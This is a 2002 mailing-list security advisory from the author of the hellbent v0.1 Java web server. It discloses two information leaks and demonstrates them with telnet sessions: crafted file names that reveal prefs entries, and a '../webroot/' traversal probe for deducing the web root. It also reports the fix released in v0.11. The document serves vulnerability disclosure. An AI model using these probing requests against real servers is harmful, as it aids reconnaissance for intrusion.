Vulnerability in hellbent

[joetesta () hushmail com]

-----BEGIN PGP SIGNED MESSAGE-----

To moderator:

I posted this on Wednesday, but it was not passed to the list and I didn't get anything back.  Here it is again.  
Thanks.
- -----

Vulnerability in hellbent



    Overview

hellbent v0.1 is a Java web server available from
http://hogs.rit.edu/~joet/code/.  There exist certain situations where the
server can leak information such as the web root.



    Details

If an attacker possesses the ability to create a file with an arbitrary name
in the web root, the server can be made to disclose the contents of any entry
in the 'hellbent.prefs' file.  This preferences file contains the web root,
the paths to the access and error logs, and IP access lists.

It should be noted that with the exception of the IP access lists, a local
attacker would naturally have all this information already.  Below is a
demonstration of the problem:



[jdog@ghettofied webroot]$ pwd
/home/jdog/hellbent/webroot
[jdog@ghettofied webroot]$ touch index.webroot
[jdog@ghettofied webroot]$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /index.webroot

HTTP/0.9 200 OK
Content-Length: 0
Content-Type: /home/jdog/hellbent/webroot/
Server: [ hellbent java webserver v0.1 ]

Connection closed by foreign host.
[jdog@ghettofied webroot]$ touch index.ipallow
[jdog@ghettofied webroot]$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /index.ipallow

HTTP/0.9 200 OK
Content-Length: 0
Content-Type: 129.21.*.*;127.0.0.1
Server: [ hellbent java webserver v0.1 ]

Connection closed by foreign host.
[jdog@ghettofied webroot]$




Using an exhaustive, brute-force technique, it is also possible for a remote
attacker to deduce the web root.  Although hellbent correctly denies any
attempts to traverse the file system using relative paths, a relative path
which exits the web root, then re-enters it is still allowed.  This behavior
was documented on the Vuln-Dev mailing list during the server's production:

    http://www.securityfocus.com/archive/82/73778

Below is a demonstration of how the web root can be deduced:



[jdog@ghettofied jdog]$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /../

HTTP/0.9 403 Forbidden

<html>
<head>
<title>403 Forbidden</title>
</head>
<body>

<center><h2>403 Forbidden</h2></center>

</body>
</html>
Connection closed by foreign host.
[jdog@ghettofied jdog]$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /../webroot/index.html

HTTP/0.9 200 OK
Content-Length: 38
Content-Type: text/html
Server: [ hellbent java webserver v0.1 ]

    This is the contents of 'index.html'.

Connection closed by foreign host.
[jdog@ghettofied jdog]$


If the attacker's path lies outside the web root, then the server will
return a 403 error.  If the attacker's path leads back into the web root,
then the server will return the object requested, and the attacker has
successfully deduced the web root.



    Solution

Version 0.11 was released which fixes these problems.  It is available at:
    http://hogs.rit.edu/~joet/code/hellbent_v011.zip



    Vendor Status

Holger Zimmermann <zimpel () t-online de> contacted the author, Joe Testa, via
<jst3290 () cs rit edu> and <joetesta () hushmail com> on Sunday, January 13, 2002.
I promptly replied and issued a fix on the same day.




    - Joe Testa

e-mail:   joetesta () hushmail com
web page: http://hogs.rit.edu/~joet/
AIM:      LordSpankatron



-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wl0EARECAB0FAjxIXiEWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNCMn
AJ9YPO5QqTuVHT7BrR5wkJ+04z8yZgCfUkh7bT/iffPii07bG9+42zY+W3Y=
=Y5Sd
-----END PGP SIGNATURE-----